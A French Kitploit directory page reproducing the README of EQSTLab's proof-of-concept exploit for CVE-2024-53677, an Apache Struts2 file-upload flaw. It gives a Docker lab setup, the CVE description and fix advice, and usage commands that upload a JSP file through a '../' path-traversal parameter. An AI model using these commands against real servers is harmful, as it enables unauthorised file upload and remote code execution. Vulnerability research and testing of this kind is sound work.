Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-53677 — Défaut de logique de téléchargement de fichiers dans l'exploit Apache Struts2 | Kitploit
Outils/GitHubGitHub/eqstlab/cve-2024-53677
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubeqstlab/cve-2024-53677

CVE-2024-53677

Défaut de logique de téléchargement de fichiers dans l'exploit Apache Struts2

Voir le dépôt
172il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Cet article de recherche est publié par EQSTLab.

CVE-2024-53677

★ CVE-2024-53677 Téléchargement sans restriction de fichier de type dangereux et PoC RCE ★

Configuration du laboratoire

root@kitploit:~
cd docker
docker build --ulimit nofile=122880:122880 -m 3G -t cve-2024-53677 .
docker run -p 8080:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name cve-2024-53677 cve-2024-53677

Chronologie

Déc. 11 : PoC de téléchargement de fichier CVE-2024-53677 publié

Description

CVE-2024-53677 : La logique de téléchargement de fichiers dans Apache Struts est défectueuse. Un attaquant peut manipuler les paramètres de téléchargement de fichiers pour permettre des traversées de chemin et, dans certaines circonstances, cela peut conduire au téléchargement d'un fichier malveillant pouvant être utilisé pour exécuter du code à distance. Ce problème affecte Apache Struts : de 2.0.0 avant 6.4.0. Il est recommandé aux utilisateurs de mettre à niveau vers la version 6.4.0 au minimum et de migrer vers le nouveau mécanisme de téléchargement de fichiers https://struts.apache.org/core-developers/file-upload . Si vous n'utilisez pas une ancienne logique de téléchargement de fichiers basée sur FileuploadInterceptor, votre application est sûre. Vous trouverez plus de détails dans https://cwiki.apache.org/confluence/display/WW/S2-067.

Comment utiliser

Git clone

root@kitploit:~
git clone https://github.com/EQSTLab/CVE-2024-53677.git
cd CVE-2024-53677

Installer les paquets

root@kitploit:~
pip install -r requirements.txt

Commande

root@kitploit:~
# Télécharger le fichier par défaut
python CVE-2024-53677.py -u <URL> -p <top.UploadFileName>
# Télécharger un fichier spécifié
python CVE-2024-53677.py -u <URL> -p <top.UploadFileName> -f <Chemin du fichier>

Exemple

root@kitploit:~
python CVE-2024-53677.py -u http://localhost:8080/upload.action -p ../test.jsp
python CVE-2024-53677.py -u http://localhost:8080/upload.action -p ../test.jsp -f ./test.txt

Sortie

CVE-2024-53677.py

Résultat

Avertissement

Ce référentiel n'est pas destiné à être un exploit d'injection d'objets pour CVE-2024-53677. Le but de ce projet est d'aider les personnes à en apprendre davantage sur cette vulnérabilité et, peut-être, à tester leurs propres applications.

EQST Insight

Nous publions des analyses de CVE et de logiciels malveillants une fois par mois. Si cela vous intéresse, veuillez suivre les liens ci-dessous pour consulter nos publications. https://www.skshieldus.com/eng/business/insight.do

Références

https://nvd.nist.gov/vuln/detail/CVE-2024-53677

https://y4tacker.github.io/2024/12/16/year/2024/12/Apache-Struts2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%80%BB%E8%BE%91%E7%BB%95%E8%BF%87-CVE-2024-53677-S2-067/

https://attackerkb.com/topics/YfjepZ70DS/cve-2024-53677

https://github.com/Trackflaw/CVE-2023-50164-ApacheStruts2-Docker

Télécharger l’outil